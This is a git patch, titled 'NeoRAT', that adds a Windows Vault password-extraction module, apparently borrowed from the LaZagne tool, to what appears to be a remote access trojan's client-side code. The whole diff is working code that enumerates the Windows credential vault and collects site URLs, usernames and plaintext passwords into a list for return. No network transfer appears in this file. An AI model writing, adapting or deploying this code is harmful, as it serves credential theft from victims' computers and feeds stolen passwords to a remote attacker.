From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL <alvin@alvinhavel.com>
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT

---
 .../lazagne/softwares/windows/vault.py             | 71 ++++++++++++++++++++++
 1 file changed, 71 insertions(+)
 create mode 100644 foreign/client_handling/lazagne/softwares/windows/vault.py

(limited to 'foreign/client_handling/lazagne/softwares/windows/vault.py')

diff --git a/foreign/client_handling/lazagne/softwares/windows/vault.py b/foreign/client_handling/lazagne/softwares/windows/vault.py
new file mode 100644
index 0000000..9c8e8cc
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/windows/vault.py
@@ -0,0 +1,71 @@
+# -*- coding: utf-8 -*-
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.winstructure import *
+from ctypes.wintypes import *
+
+
+class Vault(ModuleInfo):
+    def __init__(self):
+        ModuleInfo.__init__(self, 'vault', 'windows',  only_from_current_user=True)
+
+    def run(self):
+
+        # retrieve passwords (IE, etc.) using the Windows Vault API
+        if float(get_os_version()) <= 6.1:
+            self.info(u'Vault not supported for this OS')
+            return
+
+        cbVaults = DWORD()
+        vaults = LPGUID()
+        hVault = HANDLE(INVALID_HANDLE_VALUE)
+        cbItems = DWORD()
+        items = c_char_p()
+        pwd_found = []
+
+        if vaultEnumerateVaults(0, byref(cbVaults), byref(vaults)) == 0:
+            if cbVaults.value == 0:
+                self.debug(u'No Vaults found')
+                return
+            else:
+                for i in range(cbVaults.value):
+                    if vaultOpenVault(byref(vaults[i]), 0, byref(hVault)) == 0:
+                        if hVault:
+                            if vaultEnumerateItems(hVault, 0x200, byref(cbItems), byref(items)) == 0:
+
+                                for j in range(cbItems.value):
+
+                                    items8 = cast(items, POINTER(VAULT_ITEM_WIN8))
+                                    pItem8 = PVAULT_ITEM_WIN8()
+                                    try:
+                                        values = {
+                                            'URL': str(items8[j].pResource.contents.data.string),
+                                            'Login': str(items8[j].pUsername.contents.data.string)
+                                        }
+                                        if items8[j].pName:
+                                            values['Name'] = items8[j].pName
+
+                                        if vaultGetItem8(hVault, byref(items8[j].id), items8[j].pResource,
+                                                         items8[j].pUsername, items8[j].unknown0, None, 0,
+                                                         byref(pItem8)) == 0:
+
+                                            password = pItem8.contents.pPassword.contents.data.string
+                                            # Remove password too long
+                                            if password and len(password) < 100:
+                                                values['Password'] = password
+
+                                        pwd_found.append(values)
+
+                                    except Exception as e:
+                                        self.debug(e)
+
+                                    if pItem8:
+                                        vaultFree(pItem8)
+
+                                if items:
+                                    vaultFree(items)
+
+                            vaultCloseVault(byref(hVault))
+
+                vaultFree(vaults)
+
+        return pwd_found
-- 
cgit v1.2.3